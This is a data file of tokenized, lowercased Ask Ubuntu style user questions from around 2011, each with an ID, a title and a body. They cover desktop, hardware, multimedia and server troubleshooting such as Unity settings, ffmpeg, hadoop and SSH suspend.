35515	is it possible to install on a crt based imac ( the large , fat , old ones )	i have a very old mac from a very long time ago , it looks like this : i do n't know if this is the exact model but it is the exact color my question is : is it of any possibility that i install a modern version of ubuntu onto it ps ... it is running os 9.2 if that will help distinguish the model
35534	is there some tax reporting application ?	i am filing tax report in us using federal 1040 form . i was wondering if there is some software for tax report , with similar purpose as turbotax ? thanks and regards !
35535	core usage of my dell studio 1557	i 've notices that the sensors-applet ( that measures the temperatures of cpu ) is giving me 4 measures and only 2 of theme seems to indicate the work temperatures . here is the applet output . i 'm running ubuntu 10.04 on a dell studio 1557. is this possible that it has preformance issues with thei7-720qm core ?
35537	the computer does not wake up from sleep after a ram upgrade	i have been using this build ( and sleeping it ) for months without a problem . yesterday i upped the ram from the pre-installed 4gb across 2 sticks to 8gb across 2 sticks ... . machine boots fine and is fast and stable in the os ... . when i now sleep the machine it will go down fine , but on wake it just dies . a reboot is required . from the logs : /var/log/pm-suspend.log previous to ram upgrade : ( example of sequence ) /etc/pm/sleep.d/action_wpa suspend suspend : success . fri apr 1 16:29:00 est 2011 : performing suspend fri apr 1 18:50:18 est 2011 : awake . fri apr 1 18:50:18 est 2011 : running hooks for resume after to ram upgrade : /etc/pm/sleep.d/action_wpa suspend suspend : success . sat apr 16 22:16:12 est 2011 : performing suspend initial commandline parameters : sat apr 16 22:45:09 est 2011 : running hooks for suspend . there is no 'awake ' reference â this is now replaced with the commandline parameters ? ? any ideas ?
35543	how can i use rhythmbox to rip high-quality vbr mp3s	i have a few cds lying around that i 'd like to rip and encode in mp3 format using rhythmbox . after installing the ubuntu-restricted-extras package , one of the options that shows up in rhythmbox 's preferences under `` preferred format '' is `` cd quality mp3 , '' but from the encoder options it appears that it uses a constant bitrate . i 'd like to set up an audio profile to encode at a variable bitrate ( vbr ) at a reasonably high quality . what options do i need to use under `` gstreamer pipeline ? '' or alternatively , is there a more discoverable way to enter encoding options than entering command-line options into rhythmbox ?
35547	what internet bandwidth speed tools are available ?	is there any applications on ubuntu that could measure your bandwidth/download speed ? i would like to start a few downloads and use a bandwidth monitor like application that will give me the total download and upload speed in mbps . there used to be a software like that for windows , i ca n't recall the name though .
35551	error when formatting the hadoop filesystem	i 'm using the following sites to install and configure hadoop in ubuntu 10.10 http : //arifn.web.id/blog/2010/07/29/running-hadoop-single-cluster.html however , when i try to format the hadoop file-system , i get the following errors . amathew @ amathew-dimension-3000 : ~ $ cd /usr/local/hadoop amathew @ amathew-dimension-3000 : /usr/local/hadoop $ bin/hadoop namenode -format 11/04/16 21:23:07 info namenode.namenode : startup_msg : /************************************************************ startup_msg : starting namenode startup_msg : host = amathew-dimension-3000/192.168.1.66 startup_msg : args = [ -format ] startup_msg : version = 0.20.2 startup_msg : build = https : //svn.apache.org/repos/asf/hadoop/common/branches/branch-0.20 -r 911707 ; compiled by 'chrisdo ' on fri feb 19 08:07:34 utc 2010 ************************************************************/ 11/04/16 21:23:08 info namenode.fsnamesystem : fsowner=amathew , amathew , adm , dialout , cdrom , plugdev , lpadmin , admin , sambashare 11/04/16 21:23:08 info namenode.fsnamesystem : supergroup=supergroup 11/04/16 21:23:08 info namenode.fsnamesystem : ispermissionenabled=true 11/04/16 21:23:08 error namenode.namenode : java.io.ioexception : can not create directory /usr/local/hadoop-datastore/hadoop/dfs/name/current at org.apache.hadoop.hdfs.server.common.storage $ storagedirectory.cleardirectory ( storage.java:295 ) at org.apache.hadoop.hdfs.server.namenode.fsimage.format ( fsimage.java:1086 ) at org.apache.hadoop.hdfs.server.namenode.fsimage.format ( fsimage.java:1110 ) at org.apache.hadoop.hdfs.server.namenode.namenode.format ( namenode.java:856 ) at org.apache.hadoop.hdfs.server.namenode.namenode.createnamenode ( namenode.java:948 ) at org.apache.hadoop.hdfs.server.namenode.namenode.main ( namenode.java:965 ) 11/04/16 21:23:08 info namenode.namenode : shutdown_msg : /************************************************************ shutdown_msg : shutting down namenode at amathew-dimension-3000/192.168.1.66 ************************************************************/ can anyone help with these error messages , namely error namenode.namenode : java.io.ioexception : can not create directory /usr/local/hadoop-datastore/hadoop/dfs/name/current . $ sudo mkdir /usr/local/hadoop/datastore $ sudo chown hadoop : hadoop /usr/local/hadoop/datastore $ sudo chmod 750 /usr/local/hadoop/datastore
35558	indicator-network or a connman frontend for kde	is there any ? i ca n't seem to return the network management back to networkmanager after installnig connman ... > _ <
35560	ignore package in update manager	i do n't want to update certain packages . but this list of packages appears every time i open update manager . is there an ignore list feature for packages ? so i can add or remove packages from ignore list whenever i want ?
35566	how do i manually set the system time in virtualbox ?	i am trying to manually set the computer 's time in virtualbox but it always resets itself to what it was before i changed it . how can i disable ntp and tell the system what time i want it to be ?
35568	panel shadow is disappeared in unity	after a crash of compiz panel shadow is disappeared . this problem is specific to my main user account , other users does n't have this problem . i also checked in ccsm and shadow_match is set to 'any ' ( anyway i think this is irrelevant due to the fact that panel shadow in unity is a .png ) so , how can i re-enable panel shadow ?
35575	tweak `` send to ... '' option in nautilus	i much like windows 7 's windows explorer 's `` send to '' menu . it 's very useful and i can tweak this for my own need . i see nautilus has the same feature , but i do n't know how to tweak this ( for example , add or remove extra options ) . is there any way to do this ? i have tweaked `` send to '' options in windows explorer . see the screenshot below :
35578	using humanity system icons for created application	are there any legal issues with publishing and sharing an application that loads a humanity system icon as default .desktop ?
35579	unity `` sidebar '' - is it configurable/repositionable ?	i was reading the introduction to unity and it says the launcher was made into a sidebar for convenience on widescreen monitors . is it configurable , say to move it along the bottom of the screen , for people like me who use a `` widescreen '' monitor in `` portrait '' mode ? if not , this is a dealbreaker for me , i 'm afraid .
35581	applications not showing up in unity	this has happened a couple of times now , the unity menu ( when you click on the ubuntu logo ) has all the categories there but when you click on say media apps it will be blank the same for the other options as well . searching for something will also draw a blank =/ any help ? using ubuntu 11.04 beta 2 32bit
35587	what is changed in fonts configuration from 10.10 to 11.04 ?	i 'm not able to obtain sharp ( acceptable ) fonts , specially in firefox , in natty . in maverick i 've to delete /etc/fonts/conf.d/10- files and set 'hinting full ' in gnome-appearance-properties . this solution does n't works in natty . i 've tried many combinations linking *.conf files from /etc/fonts/conf.avail to /etc/fonts/conf.d , i 've tried to use a custom conf file ( .fonts.conf ) , i 've tried modifying dpi , i 've tried with various ttf ( including microsoft fonts ) , but no way . the result is always unacceptable . so my question is , how can i have the same behaviors of maverick fonts in natty ? edit this seems a problem with ( at least ) arial font . if i force firefox to use a different font ( eg sans ) it 's all right , but obviously this is not a solution ( i do n't want all sites have the same font ) . below an animated gif that show the differences of ariel font : take a look at `` 1 , a , g '' chars ( right click on the image and select to view in other tab )
35589	download ubuntu updates via a windows computer	is it possible to download ubuntu updates via a windows computer ? ? actually i have a dial-up connection and i am using ubuntu 11.04 ( natty alpha 3 ) and i want to upgrade to beta 2 . it takes ages to download that amount of data , but a friend of mine has a broadband connection . so can i use his computer to download updates for my distribution ? ?
35592	no wireless after resuming from suspend ?	when i resume my computer from suspend it does n't want to connect to any wireless connection . it looks like it is connecting , but after a while it asks me to retype a password for wireless connection . it connect after i restart it . i am using toshiba satellite a210 and ubuntu 10.10 ( i have the same problem with 10.04 and 11.04 beta2 . 14:00.0 ethernet controller : atheros communications inc. ar5001 wireless network adapter ( rev 01 ) subsystem : askey computer corp. device 7128 flags : bus master , fast devsel , latency 0 , irq 19 memory at cfcf0000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : ath5k kernel modules : ath5k should i file a bug ?
35594	how do i transfer files from the guest system to the host system ?	hello id like to run a windows 7 virtual machine on my ubuntu 11.04 . but is there a solution to transfer files from the vm to the hostsystem ( in my case ubuntu 11.04 ) . i would use the vm for converting some files . then i would like to copy them to my hdd on ( ubuntu 11.04 ) . is this possible ?
35596	is is possible to calibrate the battery for my lenovo ideapad s10e laptop ?	on a macbook with macos x , it is possible to `` calibrate '' the battery to optimise its performance and sync up the battery meter with the current battery charge . i have a lenovo ideapad s10e running ubuntu 10.10 with the standard gnome desktop . when my battery is fully charged according to the hardware ( i.e . the amber charging led on the front goes solid blue ) , the battery meter shows the battery as about 90 % full . this is really only a minor annoyance , as the estimated time remaining is reasonably accurate , but i 'd like to sync it up . also , it 's possible that my battery has built up a memory so that it is truly not fully charging . the battery is the standard three-cell lion battery that ships with the netbook . update : after a full charge , here is what the kernel reports about the battery : : jmglov @ alhana ; cat /proc/acpi/battery/bat0/info present : yes design capacity : 2808 mah last full capacity : 0 mah battery technology : rechargeable design voltage : 10800 mv design capacity warning : 280 mah design capacity low : 84 mah cycle count : 0 capacity granularity 1 : 10 mah capacity granularity 2 : 25 mah model number : le30_s serial number : battery type : lion oem info : sanyo : jmglov @ alhana ; cat /proc/acpi/battery/bat0/state present : yes capacity state : ok charging state : charged present rate : 0 ma remaining capacity : 2494 mah present voltage : 12414 mv the fact that last full capacity is reported as 0 mah is very strange . i 'm sure it used to report a number close to the design capacity .
35599	how to add seperators to static quicklists in unity ?	i created a firefox quicklist as shown below , however i would like to also add commonly used websites in that quicklists under a seperate group . to present it visually nice i would like to add seperators ( white lines as seen in the screenshot ) to seperate that from the other existing commands . is there any code or any other way to do this ? how do i add a seperator to the quicklists in unity ?
35602	using gnome-open to open pdf files	i configured evince to be my default application to open pdf files ( using open with ... and clicking on always opening pdf files with this application ) , but when i type gnome-open foo.pdf instead of evince , i have nautilus that opens up in the correct folder highlighting the file of my choice . this is especially disturbing since i am using the latex plugin for gedit , and when i try and compile a tex file to pdf , instead of opening up a new window with my compiled pdf file , i just have nautilus pop-up . i know i can edit the scripts of my gedit latex plugin to call on evince ( or acroread ) with the pdf i want opened , but this is a workaround and not the solution i am looking for .
35605	splitting an mp4 file	what is the fastest and less resource consuming method for splitting an mp4 file ? @ alex : it did n't work , i do n't know why . see the out put here : asafche @ asafche-laptop : ~ $ ffmpeg -vcodec copy -ss 0 -t 00:10:00 -i /home/asafche/videos/myvideos/mah00124.mp4 /home/asafche/videos/myvideos/eh.mp4 ffmpeg version svn-r0.5.1-4:0.5.1-1ubuntu1.1 , copyright ( c ) 2000-2009 fabrice bellard , et al . configuration : -- extra-version=4:0.5.1-1ubuntu1.1 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- disable-stripping -- disable-vhook -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- enable-shared -- disable-static libavutil 49.15 . 0 / 49.15 . 0 libavcodec 52.20 . 1 / 52.20 . 1 libavformat 52.31 . 0 / 52.31 . 0 libavdevice 52 . 1 . 0 / 52 . 1 . 0 libavfilter 0 . 4 . 0 / 0 . 4 . 0 libswscale 0 . 7 . 1 / 0 . 7 . 1 libpostproc 51 . 2 . 0 / 51 . 2 . 0 built on mar 31 2011 18:53:20 , gcc : 4.4.3 seems stream 0 codec frame rate differs from container frame rate : 119.88 ( 120000/1001 ) - > 59.94 ( 60000/1001 ) input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from '/home/asafche/videos/myvideos/mah00124.mp4 ' : duration : 00:15:35.96 , start : 0.000000 , bitrate : 5664 kb/s stream # 0.0 ( und ) : video : h264 , yuv420p , 1280x720 , 59.94 tbr , 59.94 tbn , 119.88 tbc stream # 0.1 ( und ) : audio : aac , 48000 hz , stereo , s16 output # 0 , mp4 , to '/home/asafche/videos/myvideos/eh.mp4 ' : stream # 0.0 ( und ) : video : libx264 , yuv420p , 1280x720 , q=2-31 , 90k tbn , 59.94 tbc stream # 0.1 ( und ) : audio : 0x0000 , 48000 hz , stereo , s16 , 64 kb/s stream mapping : stream # 0.0 - > # 0.0 stream # 0.1 - > # 0.1 unsupported codec for output stream # 0.1 it says something about different frame rate ...
35607	test automatic connectivity	i tried test automatic connectivity on 11.04 beta 2 and as i try to follow these instructions : using unity ensure that networkmanager is running ( computer icon in the notification area ) and that no networks are currently connected . click on ubuntu logo and search terminal . in the terminal , run ifconfig . verify that only the loopback device ( `` lo '' ) is listed . right-click on the networkmanager icon and ensure that enable wireless is checked . after approximately 30 seconds , left-click on the networkmanager icon . verify that one or more wireless networks are visible . select an open ( no `` shield '' symbol next to it ) network and left-click it . verify that the network connection succeeds and that a series of bars replaces the networkmanager icon . in the terminal , run ifconfig . verify that a new network interface is listed . in the terminal , run route -n. note the ip address that is not `` 0.0.0.0 '' in the gateway column . in the terminal , run ping -c 5 [ gateway ] where [ gateway ] is the ip address of the gateway , above . verify that the command reports `` 5 packets transmitted , 5 packets received '' . in my case it is not only loopback listed : eth0 link encap : ethernet hwaddr 00:1b:38 : b4:3e : a3 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:44 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:60 errors:0 dropped:0 overruns:0 frame:0 tx packets:60 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:4496 ( 4.4 kb ) tx bytes:4496 ( 4.4 kb ) wlan0 link encap : ethernet hwaddr 00:1b:9e:8e : c8:46 inet6 addr : fe80 : :21b:9eff : fe8e : c846/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:1143 errors:0 dropped:0 overruns:0 frame:0 tx packets:1193 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:759864 ( 759.8 kb ) tx bytes:186146 ( 186.1 kb ) the same thing with verify release of device test . in instruction it 's written to get just `` lo '' in terminal , but i get also eth0 : eth0 link encap : ethernet hwaddr 00:1b:38 : b4:3e : a3 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:44 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:60 errors:0 dropped:0 overruns:0 frame:0 tx packets:60 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:4496 ( 4.4 kb ) tx bytes:4496 ( 4.4 kb ) in instruction it is written , that it should be only loopback . i obviously have more than just `` lo '' . what 's the deal with this ?
35608	command line calculator that keeps fractional values	i just found a good command line calculator program called bc and was satisfied with it until i discovered it rounds off fractional values , thus causing loss in precision . according to its man page : all numbers are represented internally in decimal and all computation is done in decimal . ( this version truncates results from divide and multiply operations . ) could you please suggest an equivalent of bc for ubuntu maverick ? i need to make advanced command line calculations with variables .
35623	custom mount points in gvfs	is there a way to attach gvfs mount to a custom directory ? so instead of ~/.gvfs/sftp for leon on filezzzz.tim-online.nl/ something like : ~/mounts/filezzzz.tim-online.nl/ ? i thought about using pam_mount but that lacks the nice gnome keyring integration .
35625	how do i make unity remember which applications are in the launcher ?	when i log out and then log in again , the applications shown in unity launcher are the default applications , neither can i add an application nor can i hide a default application . how to make unity remember my apps ?
35629	are ppa 's safe to add to my system and what are some `` red flags '' to watch out for ?	i see a lot of interesting programs out there that can only be obtained by adding a `` ppa '' to the system but , if i 'm understanding correctly , we should stay within the official `` repositories '' for adding software to our system . is there any way for a novice to know if a `` ppa '' is safe or if it should be avoided ? . what tips should the user know about when dealing with a ppa in the first place .
35637	gedit messes up file names in headline	i open several text files in gedit . but when switching to view different text files , the file name shown in the headline of gedit is messed up . so i was wondering if it is a bug and how to solve this problem ? thanks and regards ! for example , when i switched from file1 to file2 by clicking the tab of file2 , the main window shows the content of file2 , while the headline of gedit shows `` file1 '' . if wait 15 seconds or so , the headline will change to `` file2 '' . p.s . my gedit is gedit 2.30.3 and os is ubuntu 10.10
35638	why am i unable to access the context menus in new firefox ?	many times , i will go to right click on something in firefox 4 , and the context menu will disappear the second i move my mouse . i can use the arrow keys to select . this comes and goes . when i was running maverick , and switched to minefield , and it began to happen , i wondered if it was something to do with all my customisations and compiz , but now it is happening in my fairly stock natty amd64 install .
35640	how can i execute a command through a browser ?	i 'm trying to create a link that will run a command ( more specifically , open an ebook ) . is there a way to do this ?
35641	convert caf to mp3 or wav ?	i have a caf server on my ubuntu 9.10 server and i need to convert them to mp3 or wav . i have already tried with pacpl and ffmpeg , but it did n't work ( i do n't have the right encodings in ubuntu ) . does anyone know how to convert the caf file in ubuntu ? edit : the output of the pacpl command ( pacpl input.caf -to mp3 ) is : converting : [ test.caf ] - > [ mp3 ] decode failed with exit status : 256 total files converted : 0 , failed : 1 pacpl 6a27cb1fcd120491531eb8b984c536bd.caf -t wav perl audio converter - 4.0.5 when decoding a wav : converting : [ 6a27cb1fcd120491531eb8b984c536bd.caf ] - > [ wav ] decode failed with exit status : 256 total files converted : 0 , failed : 1
35642	setting the owner of the file created by start-stop-daemon output redirection	i have the following line in do_start ( ) of my custom init script that starts a java application : start-stop-daemon -- background -- start -- quiet -- oknodo -- make-pidfile -- pidfile $ pidfile -- chdir $ solr_dir -- chuid $ user -- exec $ daemon -- \ $ daemon_args > > $ log_dir/ $ name.log 2 > > $ log_dir/ $ name.err when expanded , becomes : start-stop-daemon -- background -- start -- quiet -- oknodo -- make-pidfile -- pidfile /var/run/solr.pid -- chdir /home/phuihock/src/proj/solr -- chuid phuihock -- exec /usr/bin/java -- -jar start.jar > > /home/phuihock/src/proj/logs/solr.log 2 > > /home/phuihock/src/proj/logs/solr.err the log files created are owned by user root , group root . i 'd expect they are owned by the user i set with -- chuid , because from the manpage , everything after -- are passed unmodified . my question is , are all redirects from start-stop-daemon owned by root , and is there a way to change that ?
35647	how do i setup openvpn so i can securely use the internet from an unsecured hotspot ?	goal : i want to be able to securely use the internet via my home pc while my notebook is connected to an open hotspot/access point . i do know that i can use a ssh tunnel/socks proxy , but i do n't want to fiddle around with applications ( making them use it , if even possible ) . i guess what i need is an openvpn setup , so i 'm looking for a detailed guide on how to : install and setup the openvpn server setup the openvpn client ( networkmanager ) ubuntu versions this should work on are 10.10 and 11.04 .
35650	did the gtk-integration of libreoffice improve with 3.4 ?	in these release notes ( http : //wiki.documentfoundation.org/releasenotes/3.4 # gui ) it reads that the gtk-integration should be improved . does it look completely native now ?
35654	is it normal for syndaemon to use 100 % cpu ?	since i upgrade to 11.04 , the new ubuntu one daemon ( syndaemon ) is using 100 % at somewhat random intervals . i 'm not updating any files in the folder to my knowledge , so it 's a bit confusing as to why it would do this . is this normal behaviour ? if it is , then i understand , ( only , when it uses so much cpu , my system becomes almost unusable ! ) : ) edit : oops ! it was n't actually ubuntu-one ( i had problems with it in the past and got the process name mixed up in my head/memory ) . chipaca 's answer is accurate for me .
35655	ubuntu one ( client ) on a server	i have several remote servers ( without gui ) . i am using vim as my editor . on my desktop i sync my vim files ( .vimrc .vim/plugins etc ) with ubuntu one . so i can use vim files on other desktops . but i want to use them also on my servers . can i use ubuntu one without installing ( apt-get install ubuntuone-client ) 154 newly packages with 49.9mb of archives ?
35666	i 'm looking program for vector based animation/video	i want to create a video . the idea is to make a large ( fixed ) image where camera is flying above . i am familiar with inkscape so i would prefer to make the image with it . i need a program to move the camera across the image and save it to a video file . alternatively i need another program to create and animate the video . does somebody have an idea ? a couple of years ago i worked with fireworks , but i do n't have a windows system or a fireworks license here .
35671	make gconftool-2 set wallpaper from root dir	there are wallpapers in a root directory . i need to set to some user that i choose a wallpaper from that directory . how can i do that ? thank you .
35673	how to fill out the forms and save the inputs in this tax report pdf file	i am filing tax report for maryland state using form 502 . if i use evince 2.32.0 using poppler/cairo ( 0.14.3 ) , it will recognize the forms and no way i can fill in anything . if i use adobe reader 9 , i can fill in the forms , but the software says there is no way to save the inputs unless print out . so i was wondering what ways can i use to fill in the forms in the pdf file and still am able to save the input and the forms without printing . thanks and regards ! p.s . my os is ubuntu 10.10 .
35674	how to add cardapio to panel ?	i followed the instructions shown for downloading ( i 'm on maverick ) at the launchpad site for this main menu replacement : https : //launchpad.net/cardapio it indicates that once you do this , it should show up in the add to panel list of applets , but i 'm not seeing it . this is the first time i 've installed a new applet ; do i need to restart my session to see it ?
35676	is there a vertical clock applet ?	i want to keep my panels down to one , running vertically along the left side of my screen . i 'm using the dockbarx applet for launchers and open application access , and have an applet main menu replacement that shows just an icon to save space . however , the date/time is n't customizable , and it shows up sideways . is there a clock replacement applet that will display the date and time in a vertical format ?
35681	how can i copy a gtk theme ?	suppose i am trying some distro ( with gnome ) and i like some theme . how can i copy for installation in another computer ?
35682	why does my calculator automatically open ( multiple times ) when my computer is idle ?	calculator is opening multiple times automatically during normal operation and while idle .
35683	how to change clicking behavior when double clicking on a mountable unit	when clicking on a mountable unit on the desktop on ubuntu 10.10 the first double click mounts the unit while the second one tells nautilus to show the user what is inside the mountable unit . i want to find out how to make it so a double click will do both , mount the unit and show it .
35684	who can send me a skype package ?	i live in china and now want to download skype from skype.com , but the web can not open . i have tried many websites to download the package but none of them worked . it seems that skype is not popular with u-know-who ... who can send me a package by email ! help ! [ email hidden ] . thanks !
35685	how to get differents backgrounds for each desktop working properly ?	i 've followed all the instructions for getting differents wallpapers for each desktop . i 'm using ubuntu 10.10 . i 've installed compiz-fusion-plugins-extra to add wallpaper plugin on my compiz settings manager ( ccsm ) . but unfortunaly i can not get my wallpapers working properly . i follow these instructions http : //ubuntuguide.net/different-wallpapers-on-each-workspace-in-ubuntu and i just get a black background . everything works fine after i press win+p ( i do n't know what is this shortcut , refresh output i guess ) or switch between ttf1 and ttf8 ( ctrl+alt+f1 and ctrl+alt+f8 ) . i tried reboot but the problem persist . what can i do to resolve this issue ?
35688	how can i change unity 's super-t binding to something else ?	first , i 've tried searching several threads to find the answer , but i could n't find one that solved my problem , so i 'm opening a new one here . i just installed ubuntu 11.04 with the new unity desktop , and i 'm trying to change the key binding of super-t from open trash ( which i do n't have much use for ) to open terminal ( which i use all the time ) . i tried running `` keyboard shortcuts '' and changing the binding in there to `` mod t , '' but that did n't work and it seems to get overridden by something else . so then i installed compiz-config-settings-manager and i looked for a keybinding in there for super-t , but i could n't find any . in fact , i even tried changing a random feature in ccsm to super-t hoping that it would tell me there was a conflict with that binding and i could locate it there . but instead it let me use super-t . sadly , after i changed it , i pressed super-t and it still opened the trash . is there another place that i can change the key bindings of super-t ? thanks
35689	highlight manpages syntax ?	is there a way to `` colorize '' manpages output ? i mean - the output of for example : man command_name
35691	constraint-based software to help with scheduling	overview i have a set of duties i must schedule employees for . the duties recur weekly over a two-month period . there are a number of constraints that define a good schedule . ( see below for examples . ) in the past , i 've made the schedule by hand , but doing it by hand is time-consuming and virtually guarantees a buggy schedule . i 'm looking for software that will make the schedule for me . i 've tried taskjuggler , but i 'm not sure whether it 's even capable of doing what i want ( the documentation is unhelpful and the folks on the mailing list merely tell me to read the documentation -- which i 've done without conclusive results ) . can anybody recommend something ? details example schedule here 's an example schedule . note that since this one was handmade , it contains an error or two . example constraints here are some of my constraints : all scheduled duties must be able to be manually-specified . each teacher must have exactly two weekends off . some weekends are defined as mandatory working weekends ; no teacher may have those weekends off . other weekends may be mandatory off weekends ; such weekends have no scheduled duties and count toward each teacher 's two weekends off . finally , there may be other weekends which have no assigned duties but nevertheless do n't count toward teachers ' two weekends off . duties should be assigned as evenly as possible . this means that so far as possible , each teacher must have a given duty the same number of times , have each different duty an equal number of times , and have an equal weight of duties on a given weekend ( see below for weighting duties ) . where this is not possible , the surplus duties should be balanced between teachers . ideally , surplus duties should be scheduled taking into account each teacher 's preferred duties ; thus , a teacher who prefers the children 's story might get it an extra time instead of one who really does n't like it . no teacher should have the same duty on consecutive weeks . no teacher may be scheduled on their weekend off . no teacher may have simultaneous duties . the major duties are tgif and the sermon . no teacher should have another duty on the same day as they are scheduled for a major duty . no teacher should have more than one major duty per week . if possible , no teacher should have a major duty on consecutive weeks . this , however , is not a particularly high-priority constraint .
35693	how do i upgrade from ubuntu 10.10 to ubuntu 11.04 ?	the update manager is n't picking up 11.04
35697	using wget to download pictures results in junk files	commands : mkdir -p sun-yat-sen & & wget -- directory-prefix=sun-yat-sen -r -nd -np -a.jpg -erobots=off http : //en.wikipedia.org/wiki/sun_yat-sen_university there are several pics on the link : http : //en.wikipedia.org/wiki/sun_yat-sen_university , after the download process , what i get is all those junk jpg files which could not open by my gnome imgae viewer . so , what is the reason ? thanks in advance
35700	delete gtk theme	i want to delete gtk themes which come by default in ubuntu 10.10 . as i open appearance , theme delete button is shown disabled for me . how i can delete theme by using appearance instead of going to command line ?
35701	video does n't work well in skype	my built in cam works fine in cheese . however in skype it does n't show me at all . in test skype show myself view does n't work either . how to solve this problem ? thanks !
35707	is there a cpu temperature monitor for natty ?	since there are no panel applets in natty , is there any way i could monitor my cpu temp ? i know that the sensors command does the same but i need something that i can monitor very easily .
35708	read character encoding with sed	i 'm trying to write a bash script to convert all special characters inside a file ( é , ü , ã , etc ) into latex format ( \'e , \ '' u , \~a , etc ) . usually , this stuff is really easy to do with sed , but i 'm having trouble at getting sed to recognize the special characters . how can i tell the command to read the file using iso , or utf-8 encoding ? if that 's not possible , is there a way to get sed to understand special characters ?
35711	is it really necessary to upgrade the kernel ?	ubuntu frequently show kernel update in update manager . my question is , i have fully working system . now is it really necessary to update the kernel ? what are the pros and cons of updating kernel ? after updating kernel , should i keep older kernel version ?
35713	`` simple '' gnome applets in unity - stickynotes	i guess this is a related question to can i use gnome applets in unity ? ( moved by suggestion of @ jorge castro ) i 'd like to use stickynotes_applet in unity.. now in gnome , this applet gets added to a bar , then i have to click it to create a new note , and i can call preferences to have the notes stick on the desktop - which is all i need . obviously , as mentioned here , it will not be possible to use this applet directly in unity ; but basically , all i 'd need to do is to raise the preferences window ( so as to make the notes stick ) , and to somehow issue a command for a new note ( which would otherwise be performed by a click on the applet icon in the gnome bar ) . i have tried running '/usr/lib/gnome-applets/stickynotes_applet ' and seemingly it runs , although no applet icon is shown ( which is expected ) , and no any other windows either ( which i otherwise hoped will show : ) ) . so i was wandering - given that this applet does n't ( seem to ) have anything special related to desktop - is there a command line way to basically run this applet , issue a 'show preferences ' command to it , and issue a new note command to it within a unity environment ( currently i can call tomboy from command line and it works - but its windows are too clunky for my taste ) ? ( and bonus question - how would you start an applet related window only from the command line in classic gnome ? ) desktop integration does n't matter all that much to me - i 'd run this manually from the command line gladly , as long as i get small compact notes that stay on the desktop ( as long as the process is active ) .. thanks for any comments , cheers !
35715	how to install firefox 3.6 and 4.0+ in parallel ?	up until last week , i had both firefox 3.6 and firefox 4.0 installed , which was good for testing web applications . but now the nightly channel contains firefox 6 instead of firefox 4 . i tried using the stable channel , but that replaced firefox 3.6 .
35717	feature request : when the ubuntu button goes blue in 11.04	when the ubuntu button goes blue in 11.04 it is signifying that a window needs attention . yes ? so is it possible that when you click on the ubuntu button when it is blue that it takes you to the window that needs attention .
35719	how do i suspend over ssh ?	i guess this question is pretty much the same as how to configure dbus to allow ssh-user to suspend server ? ; except i wanted to formulate it better . assume i have an ubuntu server running nonstop , let 's call it myserver . let 's say then , i have another pc on the same local network as myserver , let 's call it mylocalpc . mylocalpc is then kept in suspend , unless it is turned on via wakeonlan by myserver . this part of the process works perfectly for me : i can log in via ssh to myserver , and on the myserver ssh prompt i can issue wakeonlan , and mylocalpc wakes up - great . then , however , as soon as i 'm done working with mylocalpc , i 'd like to put it into suspend again . the problem is as follows - i can put the machine in suspend easy , if i ssh into mylocalpc first via ssh : [ myserver ] $ ssh mylocalpc [ mylocalpc ] $ dbus-send -- session -- dest=org.freedesktop.powermanagement -- type=method_call -- print-reply -- reply-timeout=2000 /org/freedesktop/powermanagement org.freedesktop.powermanagement.suspend this will suspend mylocalpc - but will also block the ssh exiting properly , and eventually the ssh to myserver ends up frozen . i try to get tricky and issue something like this : [ myserver ] $ ssh mylocalpc `` dbus-send -- session -- dest=org.freedesktop.powermanagement -- type=method_call -- print-reply -- reply-timeout=2000 /org/freedesktop/powermanagement org.freedesktop.powermanagement.suspend '' failed to open connection to `` session '' message bus : /bin/dbus-launch terminated abnormally with the following error : autolaunch error : x11 initialization failed . then i read somewhere display variable should be defined - but that fails too : [ myserver ] $ ssh mylocalpc `` display=:0 dbus-send -- session -- dest=org.freedesktop.powermanagement -- type=method_call -- print-reply -- reply-timeout=2000 /org/freedesktop/powermanagement org.freedesktop.powermanagement.suspend '' error org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.powermanagement was not provided by any .service files so does anyone know how can i issue a suspend to mylocalpc , without the ssh connection to myserver freezing ?
35722	what is kernel panic ?	i just completed an os course . i heard the phrase `` kernel panic '' a lot . can you explain what is a kernel panic ? why does it occur ? how can i find out that a kernel panic occurred ? what effect does it have on the system ? does it only occur in linux ? how can i prevent it ?
35725	installing f-prot	i downloaded the free-edition of f-prot anti-virus for linux . i am new to linux and not following how to initiate the installation process . i have extracted the f-prot files in a folder on my desktop . there is one file with the name : install-f-prot.pl . it is a perl file . it is giving below mentioned error when i try to run the above perl file : failed to create symbolic link /etc/f-prot.conf - > /home/rp/desktop/f-prot/f-prot.conf : permission denied
35738	what are launchpad packaging recipes and how can i use them ?	as i understand it , packaging recipes are a way to automate packaging into a ppa from a bzr branch . what i 'm not sure of is how to go about setting one up . i have read the documentation but for some reason it still leaves me a litte confused about what to do . what is the step by step process of setting up a recipe ? ( a 'hello world ' example would be useful ) what needs to go into the branch ? ( eg . debian/ directory ) what do you write in the recipe text field and what does it all mean ?
